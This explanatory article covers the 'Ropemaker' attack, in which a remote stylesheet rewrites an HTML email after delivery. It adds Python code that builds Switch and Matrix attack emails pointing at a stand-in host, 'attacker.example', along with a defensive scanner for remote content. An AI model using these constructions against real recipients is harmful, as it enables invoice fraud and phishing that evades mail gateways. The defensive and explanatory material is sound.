Researchers from Mimecast, a security company based in the U.K., have uncovered an exploitable vector for launching email attacks.
The exploit relies on two things: HTML email's dependence on CSS for its presentation, and the ability of an email client to fetch that CSS from a remote server every time the message is displayed, including long after delivery.
That combination opens up several attack possibilities, as we shall see.
Cascading Style Sheets
The Hyper-Text Markup Language, more commonly known as HTML, is designed for structuring information; on its own it leaves the final display looking plain.
To produce a more appealing presentation for web pages and other HTML-based content such as HTML email, Cascading Style Sheets (CSS) are used. A stylesheet can be embedded in the document itself, or the document can reference a stylesheet by URL so that the client fetches it from a remote server at display time.
It is this remote loading that makes Ropemaker possible: the stylesheet is fetched when the message is viewed, not when it is delivered, so whoever controls the stylesheet's host controls how the message looks at any later moment.
The Email Exploit
Ropemaker was discovered by Francisco Ribeiro from Mimecast.
The “Ropemaker” acronym stands for “Remotely Originated Post-delivery Email Manipulation Attacks Keeping Email Risky.”
It depends on the email client being allowed to load a CSS file from a remote location in order to display an HTML email as intended.
The applications of Ropemaker, as with most other exploits, are limited only by the imagination of the attacker.
By simply changing the CSS code under the attacker’s control, the destination URL contained in the email could be changed from a safe address to a malicious one.
A blank or even simple “How are you?” message could be changed into an entirely different message.
A “Yes” could be changed into a “No,” which can have important business consequences, or even a $10 changed into $10,000.
Web-Based Mail Remains Safe
According to the researchers, web-based email services like Gmail, iCloud and Outlook Web Access are all immune to a Ropemaker attack.
Mobile and desktop email clients like Microsoft Outlook, Apple Mail and Mozilla Thunderbird, on the other hand, could all fall victim.
The research team also tested an Android email client, which was immune to the attack.
However, they noted that Android clients could not be classified as safe, because of the numerous Android versions in the market.
The Anatomy of a Ropemaker Attack
The researchers highlighted two different types of a Ropemaker attack, as well as the possibility of other related attacks.
They are as follows:
- Attack 1: The Switch Exploit
This method is based on having more than one version of a message, or of part of a message, in the delivered body and then using CSS to control which version is displayed. Each version is contained in a <div> with a unique id. The version to be displayed is assigned the CSS directive `display: inline;`, while the other version(s) are hidden with `display: none;`. At delivery time the remote stylesheet shows the benign version; once the message has passed the gateway and sits in the inbox, the attacker edits the stylesheet on the remote server and the client renders the malicious version instead.
This is the simplest type of Ropemaker attack. Because both versions, including any malicious link, are present in the delivered message body, most security checks on the raw message can still detect them; even so, an attacker could use this exploit effectively.
- Attack 2: The Matrix exploit
The second type of attack is more sophisticated than the first. With the Matrix exploit, a matrix of ASCII text containing every character of the alphabet (each character in its own individually addressable element) is sent as part of the email. The attacker then uses the remote CSS to control which individual characters are shown and, by hiding all the others, assembles a sentence of his choosing. This second type of attack is much more difficult for email gateways to detect, because the delivered message contains no sentence and no URL as such, only a grid of single characters; it gives the attacker the opportunity to display URLs to any web address. Even well-known malicious URLs can be delivered this way without the gateway ever seeing the URL as a string.
- Other Possible Attacks
The "Man in the Middle Attack" is simply a scenario where an attacker can intercept the email client's request for the CSS file. The remote host may be completely trustworthy in this situation, but the attacker in the middle can inject his own code into the stylesheet as it is returned, which is a particular concern when the stylesheet is fetched over plain HTTP rather than HTTPS. External SVGs could also be used, with links and text, to create URLs or display other content to the email user.
HTML tags like <iframe> and <embed> could also be injected in order to introduce new documents, or even applications.
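The following is an added example, not code from Mimecast or from the original article, that makes the Switch and Matrix attacks described above concrete. It builds the HTML body of each attack email, the two versions of the remote stylesheet (the one served at delivery and the one the attacker swaps in afterwards), and a deliberately minimal stand-in for the mail client's renderer that only understands `display` declarations on tag and `#id` selectors. The hosts `attacker.example` and `intranet.example`, the invoice text and the character alphabet are all assumptions made for the demonstration.

```python
import re
from html.parser import HTMLParser

# Constructed sample for the Switch exploit: both versions of the message are
# in the delivered body; the remote stylesheet decides which one is shown.
# attacker.example and intranet.example are hypothetical hosts.
SWITCH_HTML = """<html><head>
<link rel="stylesheet" href="https://attacker.example/style.css">
</head><body>
<p>Please review the attached invoice:</p>
<div id="good">Invoice #4711: amount due $10</div>
<div id="bad">Invoice #4711: amount due $10,000</div>
<a id="link-good" href="https://intranet.example/invoice">Pay now</a>
<a id="link-bad" href="https://attacker.example/invoice">Pay now</a>
</body></html>"""

# Stylesheet served while the mail is delivered and scanned by the gateway ...
SWITCH_CSS_AT_DELIVERY = """
#good, #link-good { display: inline; }
#bad, #link-bad { display: none; }
"""
# ... and the stylesheet the attacker swaps in once the mail sits in the inbox.
SWITCH_CSS_AFTER = """
#good, #link-good { display: none; }
#bad, #link-bad { display: inline; }
"""

# Matrix exploit: MATRIX_ROWS copies of the alphabet, one <span> per character,
# each with its own id so the remote CSS can reveal exactly one cell per row.
ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789./:-"
MATRIX_ROWS = 16

def matrix_html(rows: int = MATRIX_ROWS) -> str:
    cells = "".join(f'<span id="m{r}x{c}">{ch}</span>'
                    for r in range(rows) for c, ch in enumerate(ALPHABET))
    return ('<html><head><link rel="stylesheet" href="https://attacker.example/m.css">'
            '</head><body><p>Visit</p>\n<div>' + cells + '</div></body></html>')

def matrix_css(target: str, rows: int = MATRIX_ROWS) -> str:
    """Hide every cell, then reveal in row r the cell holding target[r].
    The message body never contains `target` as a string."""
    if len(target) > rows or any(ch not in ALPHABET for ch in target):
        raise ValueError("target does not fit the character matrix")
    rules = ["span { display: none; }"]
    rules += [f"#m{r}x{ALPHABET.index(ch)} {{ display: inline; }}"
              for r, ch in enumerate(target)]
    return "\n".join(rules)

MATRIX_HTML = matrix_html()

# Minimal stand-in for the client's renderer: only `display` declarations on
# tag and #id selectors are understood, with #id rules overriding tag rules.
RULE_RE = re.compile(r"([^{}]+)\{([^{}]*)\}")
VOID_TAGS = {"br", "hr", "img", "link", "meta", "input"}

def parse_display_rules(css: str):
    tag_rules, id_rules = {}, {}
    for selectors, body in RULE_RE.findall(css):
        m = re.search(r"display\s*:\s*([a-z-]+)", body)
        for sel in (s.strip() for s in selectors.split(",")) if m else ():
            if sel.startswith("#"):
                id_rules[sel[1:]] = m.group(1)
            elif sel:
                tag_rules[sel] = m.group(1)
    return tag_rules, id_rules

class VisibleText(HTMLParser):
    """Collect the text and link targets the user would actually see."""
    def __init__(self, tag_rules, id_rules):
        super().__init__()
        self.tag_rules, self.id_rules = tag_rules, id_rules
        self.hidden_depth = 0   # > 0 while inside a display:none element
        self.text, self.links = [], []

    def handle_starttag(self, tag, attrs):
        if self.hidden_depth:
            if tag not in VOID_TAGS:
                self.hidden_depth += 1
            return
        a = dict(attrs)
        disp = self.id_rules.get(a.get("id"), self.tag_rules.get(tag))
        if disp == "none" and tag not in VOID_TAGS:
            self.hidden_depth = 1
        elif tag == "a" and a.get("href"):
            self.links.append(a["href"])

    def handle_endtag(self, tag):
        if self.hidden_depth and tag not in VOID_TAGS:
            self.hidden_depth -= 1

    def handle_data(self, data):
        if not self.hidden_depth:
            self.text.append(data)

def visible_text(html: str, css: str):
    """Return (normalised visible text, visible link targets) for html under css."""
    p = VisibleText(*parse_display_rules(css))
    p.feed(html)
    return " ".join("".join(p.text).split()), p.links
```

Running `visible_text(SWITCH_HTML, SWITCH_CSS_AT_DELIVERY)` and then with `SWITCH_CSS_AFTER` shows the same delivered message reading "$10" with an intranet link and then "$10,000" with the attacker's link, without a byte of the message body changing. For the Matrix variant, `visible_text(MATRIX_HTML, matrix_css("attacker.example"))` spells out a host name that appears nowhere in the HTML, which is why a gateway scanning the body for URLs has nothing to match on.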
In Conclusion: Protecting Yourself
Ropemaker may be a new discovery, but it is based on an age-old computer security problem: the danger of relying on remotely loaded resources, because what the user sees depends on content the attacker controls and can change after the message has been inspected.
Neither Microsoft nor Apple considered it a threat, as they stated in their email responses to Mimecast, so users are left to protect themselves.
Disabling the loading of remote content in the email client will protect any client, as will disabling HTML email rendering entirely (viewing messages as plain text) or using only web-based email services such as Gmail.
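For a mail gateway or an incident responder who wants to find messages that can be manipulated after delivery, the following added example (not part of the original article or of any Mimecast product) scans the HTML parts of an RFC 822 message for the remote presentation and document references discussed on this page: remote stylesheets, `@import` and `url()` references to remote hosts, `<iframe>`/`<embed>`/`<object>` documents, external SVG references and remote images. The sample messages, the `attacker.example` and `intranet.example` hosts and the finding names are constructed for the demonstration.

```python
import re
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser

REMOTE_URL = re.compile(r"https?://", re.I)
# Matches @import "url", @import url(url) and url(url) with http(s) targets.
CSS_REMOTE = re.compile(r"(?:@import\s+(?:url\()?|url\()\s*['\"]?(https?://[^'\")\s]+)", re.I)

class RemoteContentScanner(HTMLParser):
    """Record every way an HTML email can pull in content that may change
    after delivery. Findings are (kind, url) tuples in document order."""
    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_style = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "link" and "stylesheet" in a.get("rel", "").lower() \
                and REMOTE_URL.match(a.get("href", "")):
            self.findings.append(("remote-stylesheet", a["href"]))
        elif tag == "style":
            self._in_style = True
        elif tag in ("iframe", "embed", "object"):
            self.findings.append(("embedded-document", a.get("src") or a.get("data", "")))
        elif tag in ("image", "use"):   # SVG elements referencing external content
            ref = a.get("href") or a.get("xlink:href", "")
            if REMOTE_URL.match(ref):
                self.findings.append(("remote-svg-reference", ref))
        elif tag == "img" and REMOTE_URL.match(a.get("src", "")):
            self.findings.append(("remote-image", a["src"]))
        # Inline style attributes can also reach out, e.g. background: url(...)
        for url in CSS_REMOTE.findall(a.get("style", "")):
            self.findings.append(("remote-css-url", url))

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        if self._in_style:
            for url in CSS_REMOTE.findall(data):
                self.findings.append(("remote-css-import", url))

def scan_html(html: str):
    scanner = RemoteContentScanner()
    scanner.feed(html)
    return scanner.findings

def scan_message(raw: bytes):
    """Scan every text/html part of a raw RFC 822 message."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            findings.extend(scan_html(part.get_content()))
    return findings

def build_sample_message(html: str) -> bytes:
    """Constructed multipart/alternative message wrapping the given HTML."""
    msg = EmailMessage()
    msg["From"] = "billing@intranet.example"
    msg["To"] = "finance@intranet.example"
    msg["Subject"] = "Invoice #4711"
    msg.set_content("Please view this message in an HTML-capable client.")
    msg.add_alternative(html, subtype="html")
    return msg.as_bytes()

# Constructed samples: one Ropemaker-style body and one self-contained body.
SUSPICIOUS_HTML = """<html><head>
<link rel="stylesheet" href="https://attacker.example/style.css">
<style>@import url("https://attacker.example/fonts.css");</style>
</head><body>
<p style="background: url(https://attacker.example/bg.png)">Invoice attached</p>
<iframe src="https://attacker.example/doc.html"></iframe>
</body></html>"""

CLEAN_HTML = """<html><head><style>p { color: #333; }</style></head>
<body><p>Invoice attached</p><img src="cid:logo"></body></html>"""
```

A message with an empty result from `scan_message` can be rendered from its own bytes alone, so what the gateway inspected is what the user will see; any `remote-stylesheet`, `remote-css-import` or `remote-css-url` finding means the rendered message can be changed from outside after delivery, which is the condition Ropemaker needs, and is a reasonable trigger for quarantining or for rewriting the message to plain text.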